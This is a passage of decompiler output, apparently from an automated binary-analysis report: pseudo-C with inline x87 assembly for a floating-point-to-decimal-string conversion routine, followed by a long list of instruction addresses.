                                                                    																		__fp0 =  *(0x30a8c0 + __eax * 8);
                                                                    																		__eflags = _v136;
                                                                    																		if(_v136 >= 0) {
                                                                    																			L208:
                                                                    																			asm("fnstcw word [esp+0x8e]");
                                                                    																			__fp0 = _v132;
                                                                    																			__ecx = _v80;
                                                                    																			_v32 = 1;
                                                                    																			__esi = _v96;
                                                                    																			__eax = _v46 & 0x0000ffff;
                                                                    																			__ecx = _v80 + 1;
                                                                    																			__fp0 = st0;
                                                                    																			_v136 = __ecx;
                                                                    																			__fp0 = st0 / st2;
                                                                    																			__eflags = __ah;
                                                                    																			_v48 = __ax;
                                                                    																			__eax = __esi + 1;
                                                                    																			asm("fldcw word [esp+0x8c]");
                                                                    																			asm("fistp dword [esp+0x18]");
                                                                    																			asm("fldcw word [esp+0x8e]");
                                                                    																			asm("fild dword [esp+0x18]");
                                                                    																			_t441 = (_v164 & 0x000000ff) + 0x30; // 0x30
                                                                    																			__edx = _t441;
                                                                    																			__fp0 = st0 / st2 * st2;
                                                                    																			 *__esi = __dl;
                                                                    																			asm("fsubp st1, st0");
                                                                    																			asm("fldz");
                                                                    																			asm("fxch st0, st1");
                                                                    																			asm("fucomi st0, st1");
                                                                    																			st1 = __fp0;
                                                                    																			if(__eflags != 0) {
                                                                    																				L212:
                                                                    																				if(__eflags != 0) {
                                                                    																					goto L210;
                                                                    																				} else {
                                                                    																					st0 = __fp0;
                                                                    																					st0 = __fp0;
                                                                    																					__ebx = _v96;
                                                                    																					_v96 = __eax;
                                                                    																				}
                                                                    																			} else {
                                                                    																				while(1) {
                                                                    																					L210:
                                                                    																					__edx = _v32;
                                                                    																					__eflags = __edx - _v124;
                                                                    																					if(__edx == _v124) {
                                                                    																						break;
                                                                    																					}
                                                                    																					__fp0 = __fp0 *  *0x30a87c;
                                                                    																					__edx = __edx + 1;
                                                                    																					__eax = __eax + 1;
                                                                    																					__eflags = __eax;
                                                                    																					_v32 = __edx;
                                                                    																					st0 = st0 / st2;
                                                                    																					asm("fldcw word [esp+0x8c]");
                                                                    																					asm("fistp dword [esp+0x18]");
                                                                    																					asm("fldcw word [esp+0x8e]");
                                                                    																					asm("fild dword [esp+0x18]");
                                                                    																					_t446 = (_v164 & 0x000000ff) + 0x30; // 0x30
                                                                    																					__edx = _t446;
                                                                    																					__fp0 = st0 / st2 * st2;
                                                                    																					 *(__eax - 1) = __dl;
                                                                    																					asm("fsubp st1, st0");
                                                                    																					asm("fldz");
                                                                    																					asm("fxch st0, st1");
                                                                    																					asm("fucomi st0, st1");
                                                                    																					st1 = __fp0;
                                                                    																					if(__eflags != 0) {
                                                                    																						continue;
                                                                    																					} else {
                                                                    																						goto L212;
                                                                    																					}
                                                                    																					goto L110;
                                                                    																				}
                                                                    																				__esi = _v108;
                                                                    																				__eflags = __esi;
                                                                    																				if(__eflags == 0) {
                                                                    																					__fp0 = __fp0 + st0;
                                                                    																					__edx =  *(__eax - 1) & 0x000000ff;
                                                                    																					asm("fcomi st0, st1");
                                                                    																					if(__eflags > 0) {
                                                                    																						st0 = __fp0;
                                                                    																						st0 = __fp0;
                                                                    																						__ebx = _v96;
                                                                    																						__ecx = __eax;
                                                                    																						goto L69;
                                                                    																					} else {
                                                                    																						asm("fucomip st0, st1");
                                                                    																						st0 = __fp0;
                                                                    																						__ebx = _v96;
                                                                    																						if(__eflags != 0 || __eflags != 0) {
                                                                    																							L284:
                                                                    																							_v144 = 0x10;
                                                                    																							do {
                                                                    																								L240:
                                                                    																								__edx = __eax;
                                                                    																								__eax = __eax - 1;
                                                                    																								__eflags =  *(__edx - 1) - 0x30;
                                                                    																							} while ( *(__edx - 1) == 0x30);
                                                                    																							_v96 = __edx;
                                                                    																							_v136 = __ecx;
                                                                    																						} else {
                                                                    																							__eflags = _v164 & 0x00000001;
                                                                    																							if((_v164 & 0x00000001) != 0) {
                                                                    																								goto L72;
                                                                    																							} else {
                                                                    																								goto L284;
                                                                    																							}
                                                                    																						}
                                                                    																					}
                                                                    																				} else {
                                                                    																					st0 = __fp0;
                                                                    																					st0 = __fp0;
                                                                    																					__eflags = __esi - 1;
                                                                    																					if(__esi == 1) {
                                                                    																						__edx =  *(__eax - 1) & 0x000000ff;
                                                                    																						__ebx = _v96;
                                                                    																						__ecx = __eax;
                                                                    																						L69:
                                                                    																						__eax = __ecx - 1;
                                                                    																						__eflags = __dl - 0x39;
                                                                    																						if(__dl != 0x39) {
                                                                    																							_v96 = __ecx;
                                                                    																							__eflags = __edx;
                                                                    																						} else {
                                                                    																							__eflags = __eax - __ebx;
                                                                    																							if(__eax == __ebx) {
                                                                    																								_v136 = _v136 + 1;
                                                                    																								__edx = 0x31;
                                                                    																								_v96 = __ecx;
                                                                    																								 *__ebx = 0x30;
                                                                    																							} else {
                                                                    																								__edx =  *(__eax - 1) & 0x000000ff;
                                                                    																								L72:
                                                                    																								__ecx = __eax;
                                                                    																								goto L69;
                                                                    																							}
                                                                    																						}
                                                                    																						 *__eax = __dl;
                                                                    																						_v144 = 0x20;
                                                                    																					} else {
                                                                    																						__ebx = _v96;
                                                                    																						_v96 = __eax;
                                                                    																						L227:
                                                                    																						_v144 = 0x10;
                                                                    																					}
                                                                    																				}
                                                                    																			}
                                                                    																		} else {
                                                                    																			__esi = _v124;
                                                                    																			__eflags = __esi;
                                                                    																			if(__eflags > 0) {
                                                                    																				goto L208;
                                                                    																			} else {
                                                                    																				if(__eflags != 0) {
                                                                    																					st0 = __fp0;
                                                                    																					goto L143;
                                                                    																				} else {
                                                                    																					__fp0 = _v132;
                                                                    																					asm("fxch st0, st1");
                                                                    																					asm("fcomip st0, st1");
                                                                    																					st0 = _v132;
                                                                    																					if(__eflags >= 0) {
                                                                    																						L143:
                                                                    																						_v132 = 0;
                                                                    																						__esi = 0;
                                                                    																						__eflags = 0;
                                                                    																						L144:
                                                                    																						__eax = _v136;
                                                                    																						__ebx = _v96;
                                                                    																						_v144 = 0x10;
                                                                    																						__eax =  ~_v136;
                                                                    																						_v136 =  ~_v136;
                                                                    																						goto L108;
                                                                    																					} else {
                                                                    																						__eax = __eax + 2;
                                                                    																						_v132 = 0;
                                                                    																						__ebx = _v96;
                                                                    																						_v136 = __eax;
                                                                    																						L107:
                                                                    																						_t248 =  &_v96;
                                                                    																						 *_t248 = _v96 + 1;
                                                                    																						__eflags =  *_t248;
                                                                    																						 *__ebx = 0x31;
                                                                    																						_v144 = 0x20;
                                                                    																						L108:
                                                                    																						_v132 = E00307720(_v132);
                                                                    																						__eflags = __esi;
                                                                    																						if(__esi != 0) {
                                                                    																							L109:
                                                                    																							__eax = E00307720(__esi);
                                                                    																						}
                                                                    																						goto L110;
                                                                    																					}
                                                                    																				}
                                                                    																				goto L304;
                                                                    																			}
                                                                    																		}
                                                                    																	}
                                                                    																}
                                                                    															} else {
                                                                    																3 = 3 - __edx;
                                                                    																__eflags = 3;
                                                                    																_v108 = 3 - __edx;
                                                                    																goto L54;
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    										goto L110;
                                                                    									}
                                                                    									goto L304;
                                                                    								}
                                                                    								asm("bsr edx, [ebp+ebx*4+0x14]");
                                                                    								_a16 = __eax;
                                                                    								__eax = __eax << 5;
                                                                    								__eax = __eax - __edx;
                                                                    								__eflags = __eax;
                                                                    								__ebx = __eax;
                                                                    								goto L25;
                                                                    								L20:
                                                                    								__ebx =  *__eax;
                                                                    								__eax = __eax + 4;
                                                                    								__edx = __edx + 4;
                                                                    								 *(__edx - 4) = __ebx;
                                                                    								__eflags = __ecx - __eax;
                                                                    								if(__ecx >= __eax) {
                                                                    									goto L20;
                                                                    								} else {
                                                                    									__eax = _v152;
                                                                    									__ebx = _v132;
                                                                    									__ecx = __ecx + 1;
                                                                    									__eax = _v152 + 1;
                                                                    									__ebx = _v132 + 4;
                                                                    									__eflags = __ecx - _v152 + 1;
                                                                    									__eax = 4;
                                                                    									__ebx =  <  ? 4 : _v132 + 4;
                                                                    									__ebx = ( <  ? 4 : _v132 + 4) >> 2;
                                                                    								}
                                                                    								goto L23;
                                                                    							} else {
                                                                    								L14:
                                                                    								__esp =  &(__esp[0x2b]);
                                                                    								__eax = __ebx;
                                                                    								_pop(__ebx);
                                                                    								_pop(__esi);
                                                                    								_pop(__edi);
                                                                    								_pop(__ebp);
                                                                    								return __ebx;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				L304:
                                                                    			}

























































                                                                    0x00305c74
                                                                    0x00305c8f
                                                                    0x00305c96
                                                                    0x00305ca1
                                                                    0x00305cac
                                                                    0x00305cb0
                                                                    0x00305cb7
                                                                    0x00305cc2
                                                                    0x00305cc6
                                                                    0x00305cca
                                                                    0x00305ccc
                                                                    0x00305cd4
                                                                    0x00305cdb
                                                                    0x00305ce5
                                                                    0x00305f84
                                                                    0x00305f8e
                                                                    0x00305f99
                                                                    0x00305fa0
                                                                    0x00305fab
                                                                    0x00305fb1
                                                                    0x00305fb2
                                                                    0x00305fb3
                                                                    0x00000000
                                                                    0x00305ceb
                                                                    0x00305ceb
                                                                    0x00305ced
                                                                    0x00305ced
                                                                    0x00305cf0
                                                                    0x00305cf4
                                                                    0x00305d18
                                                                    0x00305d1a
                                                                    0x00305d1d
                                                                    0x00000000
                                                                    0x00305d1f
                                                                    0x00305d1f
                                                                    0x00305d23
                                                                    0x00305d29
                                                                    0x00305d2d
                                                                    0x00305d38
                                                                    0x00305d3f
                                                                    0x00305d4a
                                                                    0x00305d50
                                                                    0x00305d51
                                                                    0x00305d52
                                                                    0x00305d53
                                                                    0x003059b0
                                                                    0x003059b0
                                                                    0x003059b1
                                                                    0x003059b2
                                                                    0x003059b3
                                                                    0x003059b6
                                                                    0x003059ba
                                                                    0x003059be
                                                                    0x003059c5
                                                                    0x003059c7
                                                                    0x003059c7
                                                                    0x003059cc
                                                                    0x003059d0
                                                                    0x003059d0
                                                                    0x003059d2
                                                                    0x003059d5
                                                                    0x003059d8
                                                                    0x003059d0
                                                                    0x003059dc
                                                                    0x003059df
                                                                    0x003059e4
                                                                    0x003059e7
                                                                    0x003059e9
                                                                    0x003059ec
                                                                    0x003059ec
                                                                    0x003059ef
                                                                    0x003059f2
                                                                    0x003059f6
                                                                    0x00305a00
                                                                    0x00305a00
                                                                    0x00305a03
                                                                    0x00305a06
                                                                    0x00305a09
                                                                    0x00305a0b
                                                                    0x00305a00
                                                                    0x00305a11
                                                                    0x00305a13
                                                                    0x00305a13
                                                                    0x00305a1d
                                                                    0x00305a1d
                                                                    0x00305cf6
                                                                    0x00305cf6
                                                                    0x00305cf8
                                                                    0x00305f48
                                                                    0x00305f48
                                                                    0x00305f4c
                                                                    0x00305f52
                                                                    0x00305f56
                                                                    0x00305f5e
                                                                    0x00305f62
                                                                    0x00305f69
                                                                    0x00305f6e
                                                                    0x00305f74
                                                                    0x00305f78
                                                                    0x00305f79
                                                                    0x00305f7a
                                                                    0x00305f7b
                                                                    0x00305f7c
                                                                    0x00305cfe
                                                                    0x00305cfe
                                                                    0x00305d01
                                                                    0x00305d03
                                                                    0x00305d06
                                                                    0x00305d60
                                                                    0x00305d62
                                                                    0x00305d64
                                                                    0x00305d69
                                                                    0x00305d6c
                                                                    0x00305d6e
                                                                    0x00305d6e
                                                                    0x00305d70
                                                                    0x00305d73
                                                                    0x00305d73
                                                                    0x00305d6e
                                                                    0x00305d77
                                                                    0x00305d7d
                                                                    0x00305d80
                                                                    0x00305d80
                                                                    0x00305d83
                                                                    0x00305d88
                                                                    0x00305d8c
                                                                    0x00305d8e
                                                                    0x00305d92
                                                                    0x00305d92
                                                                    0x00305d95
                                                                    0x00305d95
                                                                    0x00305dd8
                                                                    0x00305dd8
                                                                    0x00305dd8
                                                                    0x00305dda
                                                                    0x00305ddd
                                                                    0x00305de1
                                                                    0x00305de3
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00305dd0
                                                                    0x00305dd2
                                                                    0x00305fc0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00305df7
                                                                    0x00305dfa
                                                                    0x00305dff
                                                                    0x00305e03
                                                                    0x00305e0a
                                                                    0x00305e0e
                                                                    0x00305e10
                                                                    0x00305fe0
                                                                    0x00305fe7
                                                                    0x00305feb
                                                                    0x00305feb
                                                                    0x00305e16
                                                                    0x00305e19
                                                                    0x00305e1b
                                                                    0x00305f43
                                                                    0x00000000
                                                                    0x00305e21
                                                                    0x00305e2f
                                                                    0x00305e34
                                                                    0x00305e38
                                                                    0x00305e3c
                                                                    0x00305e40
                                                                    0x00305e44
                                                                    0x00305e4c
                                                                    0x00305e51
                                                                    0x00305e55
                                                                    0x00305e58
                                                                    0x00305e5d
                                                                    0x00305e61
                                                                    0x00305e63
                                                                    0x00305e67
                                                                    0x00305e6b
                                                                    0x00305e74
                                                                    0x00305e7a
                                                                    0x00305e80
                                                                    0x00305e84
                                                                    0x00305e8a
                                                                    0x00305e8e
                                                                    0x00305e90
                                                                    0x00305e94
                                                                    0x00305e9a
                                                                    0x00305e9c
                                                                    0x00305e9e
                                                                    0x00305ea0
                                                                    0x00305ea4
                                                                    0x00305ea8
                                                                    0x00305eae
                                                                    0x00305eae
                                                                    0x00305eb0
                                                                    0x00305eb7
                                                                    0x00305ebf
                                                                    0x00305ebf
                                                                    0x00305ec2
                                                                    0x00305eca
                                                                    0x00305ed1
                                                                    0x00305ed5
                                                                    0x00305edc
                                                                    0x00305ede
                                                                    0x00305ee0
                                                                    0x00306610
                                                                    0x00306614
                                                                    0x00306616
                                                                    0x00306624
                                                                    0x00306626
                                                                    0x00000000
                                                                    0x00306618
                                                                    0x00306618
                                                                    0x0030661a
                                                                    0x0030661c
                                                                    0x00306630
                                                                    0x00306630
                                                                    0x00306630
                                                                    0x00000000
                                                                    0x0030661c
                                                                    0x003065ba
                                                                    0x003065bd
                                                                    0x003065c2
                                                                    0x003065c6
                                                                    0x003065ca
                                                                    0x003065ce
                                                                    0x003065d1
                                                                    0x003065d3
                                                                    0x003065d7
                                                                    0x003065d9
                                                                    0x003065db
                                                                    0x003065db
                                                                    0x003065dd
                                                                    0x003065e1
                                                                    0x003065e5
                                                                    0x003065e5
                                                                    0x003065e7
                                                                    0x003065ed
                                                                    0x003065ef
                                                                    0x003065f0
                                                                    0x003065f1
                                                                    0x003065f2
                                                                    0x003065f3
                                                                    0x00000000
                                                                    0x00305ee6
                                                                    0x00305ee6
                                                                    0x00305ee6
                                                                    0x00305ee8
                                                                    0x00305eea
                                                                    0x00305eed
                                                                    0x00305eef
                                                                    0x00305ef3
                                                                    0x00305ef7
                                                                    0x00305ef9
                                                                    0x00305efb
                                                                    0x00305efe
                                                                    0x00305f02
                                                                    0x00305f05
                                                                    0x00306000
                                                                    0x00000000
                                                                    0x00305f0b
                                                                    0x00305f0b
                                                                    0x00305f12
                                                                    0x00305f16
                                                                    0x00305f1a
                                                                    0x00305f1c
                                                                    0x00305f1e
                                                                    0x00305f20
                                                                    0x003062b0
                                                                    0x003062b4
                                                                    0x003062bc
                                                                    0x003062c4
                                                                    0x003062c6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00305f26
                                                                    0x00305f26
                                                                    0x00305f29
                                                                    0x00305f31
                                                                    0x00306008
                                                                    0x00306008
                                                                    0x0030600c
                                                                    0x00306014
                                                                    0x00306016
                                                                    0x003065f8
                                                                    0x003065f8
                                                                    0x003065fd
                                                                    0x00306605
                                                                    0x00306607
                                                                    0x00306607
                                                                    0x0030601c
                                                                    0x00306020
                                                                    0x00306022
                                                                    0x003062cc
                                                                    0x003062cc
                                                                    0x003062d0
                                                                    0x003062d8
                                                                    0x003062dc
                                                                    0x00306028
                                                                    0x00306028
                                                                    0x0030602c
                                                                    0x0030602c
                                                                    0x0030602c
                                                                    0x00306030
                                                                    0x00306038
                                                                    0x0030603a
                                                                    0x0030603e
                                                                    0x00306040
                                                                    0x00306040
                                                                    0x00306022
                                                                    0x00305f20
                                                                    0x00306044
                                                                    0x00306048
                                                                    0x0030604b
                                                                    0x003062e8
                                                                    0x00000000
                                                                    0x00306051
                                                                    0x00306051
                                                                    0x00306054
                                                                    0x00306640
                                                                    0x00306643
                                                                    0x0030664b
                                                                    0x0030605a
                                                                    0x0030605a
                                                                    0x0030605e
                                                                    0x00306063
                                                                    0x00306068
                                                                    0x00306068
                                                                    0x0030606b
                                                                    0x0030606e
                                                                    0x0030606e
                                                                    0x00306072
                                                                    0x00306076
                                                                    0x00306079
                                                                    0x00306c40
                                                                    0x00000000
                                                                    0x0030607f
                                                                    0x0030607f
                                                                    0x00306082
                                                                    0x00306a40
                                                                    0x00000000
                                                                    0x00306088
                                                                    0x00306088
                                                                    0x0030608b
                                                                    0x00306750
                                                                    0x00306753
                                                                    0x003062f0
                                                                    0x003062f0
                                                                    0x003062f4
                                                                    0x003062f8
                                                                    0x003062fe
                                                                    0x00306305
                                                                    0x00306309
                                                                    0x00306310
                                                                    0x00306314
                                                                    0x00306317
                                                                    0x0030631a
                                                                    0x00306326
                                                                    0x0030632a
                                                                    0x0030632e
                                                                    0x00306331
                                                                    0x00306335
                                                                    0x00306335
                                                                    0x00306338
                                                                    0x0030633c
                                                                    0x00306654
                                                                    0x0030665c
                                                                    0x00306661
                                                                    0x00306669
                                                                    0x00306671
                                                                    0x00000000
                                                                    0x00306342
                                                                    0x00306342
                                                                    0x00306346
                                                                    0x00306348
                                                                    0x00307149
                                                                    0x0030714d
                                                                    0x0030714f
                                                                    0x00307157
                                                                    0x0030715a
                                                                    0x0030715c
                                                                    0x00307164
                                                                    0x00307167
                                                                    0x0030716e
                                                                    0x00307176
                                                                    0x00307178
                                                                    0x00000000
                                                                    0x0030717e
                                                                    0x00000000
                                                                    0x0030717e
                                                                    0x0030634e
                                                                    0x0030634e
                                                                    0x00306352
                                                                    0x00306356
                                                                    0x00306359
                                                                    0x00306c62
                                                                    0x00306c66
                                                                    0x00306c6e
                                                                    0x00000000
                                                                    0x0030635f
                                                                    0x0030635f
                                                                    0x00306367
                                                                    0x0030636f
                                                                    0x00000000
                                                                    0x0030636f
                                                                    0x00306359
                                                                    0x00306348
                                                                    0x00306759
                                                                    0x00306759
                                                                    0x00306761
                                                                    0x00306761
                                                                    0x00306765
                                                                    0x00306769
                                                                    0x0030676d
                                                                    0x00306770
                                                                    0x00306774
                                                                    0x00306776
                                                                    0x00306c4d
                                                                    0x00306c58
                                                                    0x0030677c
                                                                    0x0030677c
                                                                    0x0030677c
                                                                    0x00000000
                                                                    0x00306776
                                                                    0x00306091
                                                                    0x00306091
                                                                    0x00306099
                                                                    0x00306099
                                                                    0x0030609d
                                                                    0x003060a2
                                                                    0x003060a4
                                                                    0x003060a7
                                                                    0x003060ae
                                                                    0x003060b2
                                                                    0x003060b6
                                                                    0x003060ba
                                                                    0x003060bd
                                                                    0x003060c2
                                                                    0x003060c7
                                                                    0x003060cb
                                                                    0x003060cf
                                                                    0x003060d2
                                                                    0x003060d6
                                                                    0x003060d9
                                                                    0x003060dd
                                                                    0x003060dd
                                                                    0x003060dd
                                                                    0x003060e2
                                                                    0x003060e6
                                                                    0x00306110
                                                                    0x00306110
                                                                    0x00306115
                                                                    0x00000000
                                                                    0x0030611b
                                                                    0x0030611f
                                                                    0x0030611f
                                                                    0x00306123
                                                                    0x00000000
                                                                    0x00306129
                                                                    0x00306129
                                                                    0x0030612d
                                                                    0x00306131
                                                                    0x0030613c
                                                                    0x0030613e
                                                                    0x0030614a
                                                                    0x0030614c
                                                                    0x0030614e
                                                                    0x00306154
                                                                    0x00306158
                                                                    0x0030615c
                                                                    0x00306166
                                                                    0x0030616b
                                                                    0x0030616f
                                                                    0x00306173
                                                                    0x00306175
                                                                    0x00000000
                                                                    0x0030617b
                                                                    0x0030617b
                                                                    0x00306186
                                                                    0x00000000
                                                                    0x00306186
                                                                    0x00306140
                                                                    0x00306140
                                                                    0x00306142
                                                                    0x00306144
                                                                    0x0030702d
                                                                    0x00307031
                                                                    0x00307033
                                                                    0x00306680
                                                                    0x00306682
                                                                    0x00306688
                                                                    0x0030668c
                                                                    0x00306690
                                                                    0x00306698
                                                                    0x0030669a
                                                                    0x0030669a
                                                                    0x0030669f
                                                                    0x003066a3
                                                                    0x003066a3
                                                                    0x003066a9
                                                                    0x003066ad
                                                                    0x003066af
                                                                    0x003066b1
                                                                    0x003070e1
                                                                    0x003070e3
                                                                    0x003070e5
                                                                    0x003070ed
                                                                    0x003070f1
                                                                    0x003070f3
                                                                    0x00000000
                                                                    0x003066b7
                                                                    0x003066b7
                                                                    0x003066b9
                                                                    0x003066bb
                                                                    0x003066bd
                                                                    0x003066bf
                                                                    0x00000000
                                                                    0x003066c5
                                                                    0x00000000
                                                                    0x003066c5
                                                                    0x003066bf
                                                                    0x00307039
                                                                    0x00307039
                                                                    0x0030703d
                                                                    0x0030703f
                                                                    0x003066d1
                                                                    0x00000000
                                                                    0x00307045
                                                                    0x00307045
                                                                    0x0030704b
                                                                    0x00307058
                                                                    0x0030705e
                                                                    0x00307064
                                                                    0x00307068
                                                                    0x0030706c
                                                                    0x00307076
                                                                    0x0030707b
                                                                    0x0030618a
                                                                    0x0030618a
                                                                    0x0030618e
                                                                    0x00306192
                                                                    0x00306199
                                                                    0x0030619b
                                                                    0x00306e1d
                                                                    0x00306e24
                                                                    0x00306e26
                                                                    0x00306e28
                                                                    0x00306e2f
                                                                    0x00306e33
                                                                    0x00306e3a
                                                                    0x00306e3c
                                                                    0x00306e44
                                                                    0x00306e49
                                                                    0x00306e54
                                                                    0x00306e57
                                                                    0x00306e59
                                                                    0x00306e7a
                                                                    0x00306e7a
                                                                    0x00306e81
                                                                    0x00306e85
                                                                    0x00306e8c
                                                                    0x00306e90
                                                                    0x00306e92
                                                                    0x00306e94
                                                                    0x00306e98
                                                                    0x00306e9a
                                                                    0x00306e9a
                                                                    0x00306e9c
                                                                    0x00306e9f
                                                                    0x00306ea2
                                                                    0x00306ea5
                                                                    0x00306eac
                                                                    0x00306eae
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306e68
                                                                    0x00306e68
                                                                    0x00306e6b
                                                                    0x00306e71
                                                                    0x00306e73
                                                                    0x00306e73
                                                                    0x00306eb0
                                                                    0x00306eb2
                                                                    0x00306eb9
                                                                    0x00306ec0
                                                                    0x00306ec2
                                                                    0x00306ec4
                                                                    0x00306ecc
                                                                    0x00306ece
                                                                    0x00306ed0
                                                                    0x00306ed2
                                                                    0x00306ed4
                                                                    0x00306ed6
                                                                    0x0030626f
                                                                    0x00306271
                                                                    0x00306273
                                                                    0x00000000
                                                                    0x00306edc
                                                                    0x00306edc
                                                                    0x00306ede
                                                                    0x00306ee0
                                                                    0x003066cd
                                                                    0x00000000
                                                                    0x00306ee6
                                                                    0x00306ee6
                                                                    0x00306ee8
                                                                    0x00306eec
                                                                    0x00306eee
                                                                    0x00306efc
                                                                    0x00306efe
                                                                    0x00000000
                                                                    0x00306ef0
                                                                    0x00306ef0
                                                                    0x00306ef2
                                                                    0x00306ef4
                                                                    0x00307363
                                                                    0x0030736a
                                                                    0x00307372
                                                                    0x00307372
                                                                    0x00306efa
                                                                    0x00306f00
                                                                    0x00306f00
                                                                    0x00306f07
                                                                    0x00306f0f
                                                                    0x00306f0f
                                                                    0x00306f0f
                                                                    0x00306ef4
                                                                    0x00000000
                                                                    0x00306eee
                                                                    0x00306ee0
                                                                    0x003061a1
                                                                    0x003061a1
                                                                    0x003061a3
                                                                    0x003061aa
                                                                    0x003061ae
                                                                    0x003061b6
                                                                    0x003061b9
                                                                    0x003061c1
                                                                    0x003061c4
                                                                    0x003061cb
                                                                    0x003061cf
                                                                    0x003061d6
                                                                    0x003061d8
                                                                    0x003061e3
                                                                    0x003061e3
                                                                    0x003061e6
                                                                    0x003061e8
                                                                    0x003061ea
                                                                    0x003061ee
                                                                    0x003061f0
                                                                    0x003061f2
                                                                    0x00306255
                                                                    0x00306255
                                                                    0x00306257
                                                                    0x0030625d
                                                                    0x0030625f
                                                                    0x00306261
                                                                    0x00306263
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306207
                                                                    0x00306207
                                                                    0x0030620a
                                                                    0x00306211
                                                                    0x00306213
                                                                    0x003066c7
                                                                    0x003066c9
                                                                    0x003066d3
                                                                    0x003066d3
                                                                    0x00000000
                                                                    0x00306219
                                                                    0x00306219
                                                                    0x0030621f
                                                                    0x00306222
                                                                    0x00306224
                                                                    0x00306226
                                                                    0x00306228
                                                                    0x0030622f
                                                                    0x00306233
                                                                    0x0030623a
                                                                    0x00306243
                                                                    0x00306243
                                                                    0x00306246
                                                                    0x00306248
                                                                    0x0030624a
                                                                    0x0030624d
                                                                    0x0030624f
                                                                    0x00307234
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0030624f
                                                                    0x00000000
                                                                    0x00306213
                                                                    0x00306265
                                                                    0x00306267
                                                                    0x00306269
                                                                    0x00306275
                                                                    0x00306275
                                                                    0x0030627c
                                                                    0x00306280
                                                                    0x00306282
                                                                    0x00306282
                                                                    0x00306285
                                                                    0x00000000
                                                                    0x003061f4
                                                                    0x003061f4
                                                                    0x00307236
                                                                    0x00307236
                                                                    0x0030723d
                                                                    0x0030723f
                                                                    0x00307243
                                                                    0x00307247
                                                                    0x00307247
                                                                    0x0030724a
                                                                    0x0030724c
                                                                    0x00307250
                                                                    0x00306e0c
                                                                    0x00306e0e
                                                                    0x00000000
                                                                    0x00307256
                                                                    0x00307256
                                                                    0x00307258
                                                                    0x0030725a
                                                                    0x00000000
                                                                    0x00307260
                                                                    0x00307260
                                                                    0x00307260
                                                                    0x0030725a
                                                                    0x00307250
                                                                    0x003061f2
                                                                    0x0030619b
                                                                    0x0030703f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00306144
                                                                    0x0030613e
                                                                    0x00306123
                                                                    0x003060e8
                                                                    0x003060e8
                                                                    0x003060e8
                                                                    0x003060ec
                                                                    0x003060f1
                                                                    0x003060f3
                                                                    0x003060f6
                                                                    0x003060f6
                                                                    0x003060f9
                                                                    0x003060fd
                                                                    0x003060ff
                                                                    0x003066e0
                                                                    0x003066e0
                                                                    0x003066e4
                                                                    0x003066e6
                                                                    0x00306790
                                                                    0x00306790
                                                                    0x00306794
                                                                    0x00306796
                                                                    0x00306380
                                                                    0x00306380
                                                                    0x00306384
                                                                    0x00306388
                                                                    0x0030638a
                                                                    0x0030638d
                                                                    0x00306390
                                                                    0x00306392
                                                                    0x00306399
                                                                    0x0030639b
                                                                    0x00306a78
                                                                    0x00306a78
                                                                    0x00306a7d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003063a1
                                                                    0x003063a1
                                                                    0x003063a1
                                                                    0x003063a5
                                                                    0x003063a5
                                                                    0x003063a8
                                                                    0x003063a8
                                                                    0x003063ab
                                                                    0x00000000
                                                                    0x003063b1
                                                                    0x003063b5
                                                                    0x003063b7
                                                                    0x003063ba
                                                                    0x003063bd
                                                                    0x003063c1
                                                                    0x003063c4
                                                                    0x003063cb
                                                                    0x003063cd
                                                                    0x003063d0
                                                                    0x003063d2
                                                                    0x003063dc
                                                                    0x003063dc
                                                                    0x003063e0
                                                                    0x003063e4
                                                                    0x003063e8
                                                                    0x003063ec
                                                                    0x003063ec
                                                                    0x003063ee
                                                                    0x003063d4
                                                                    0x003063d4
                                                                    0x003063d6
                                                                    0x00306a83
                                                                    0x00306a83
                                                                    0x00306a87
                                                                    0x00306a8b
                                                                    0x00306a8e
                                                                    0x00306a90
                                                                    0x00306d5f
                                                                    0x00306d61
                                                                    0x00306d63
                                                                    0x00306d67
                                                                    0x00306d6b
                                                                    0x00306a96
                                                                    0x00306a96
                                                                    0x00306a96
                                                                    0x00306a98
                                                                    0x00306a98
                                                                    0x00306a9a
                                                                    0x00306a9e
                                                                    0x00306aa0
                                                                    0x00307011
                                                                    0x00307020
                                                                    0x00307024
                                                                    0x00306aa6
                                                                    0x00306aa6
                                                                    0x00306aaa
                                                                    0x00306aae
                                                                    0x00306ab5
                                                                    0x00306ab7
                                                                    0x00306abb
                                                                    0x00306abb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x003063d6
                                                                    0x003063d2
                                                                    0x003063ab
                                                                    0x003063f9
                                                                    0x003063fe
                                                                    0x00306406
                                                                    0x00000000
                                                                    0x0030679c
                                                                    0x0030679c
                                                                    0x003067a0
                                                                    0x003067a4
                                                                    0x003067a6
                                                                    0x00306408
                                                                    0x00306408
                                                                    0x0030640c
                                                                    0x0030640e
                                                                    0x00306410
                                                                    0x00306414
                                                                    0x00306416
                                                                    0x00306418
                                                                    0x0030641a
                                                                    0x0030641c
                                                                    0x0030641f
                                                                    0x00306423
                                                                    0x00306425
                                                                    0x00306425
                                                                    0x00306427
                                                                    0x0030642e
                                                                    0x00306432
                                                                    0x00306432
                                                                    0x00306416
                                                                    0x00306436
                                                                    0x0030643a
                                                                    0x0030643c
                                                                    0x0030643e
                                                                    0x00306442
                                                                    0x00306444
                                                                    0x00306c22
                                                                    0x00000000
                                                                    0x0030644a
                                                                    0x0030644a
                                                                    0x0030644c
                                                                    0x00306455
                                                                    0x0030645a
                                                                    0x0030645e
                                                                    0x00306461
                                                                    0x00306463
                                                                    0x00306468
                                                                    0x0030646b
                                                                    0x0030646f
                                                                    0x00306474
                                                                    0x00306474
                                                                    0x00306478
                                                                    0x0030647c
                                                                    0x0030647c
                                                                    0x0030647e
                                                                    0x00306c26
                                                                    0x00306c32
                                                                    0x00306c32
                                                                    0x0030647e
                                                                    0x00306444
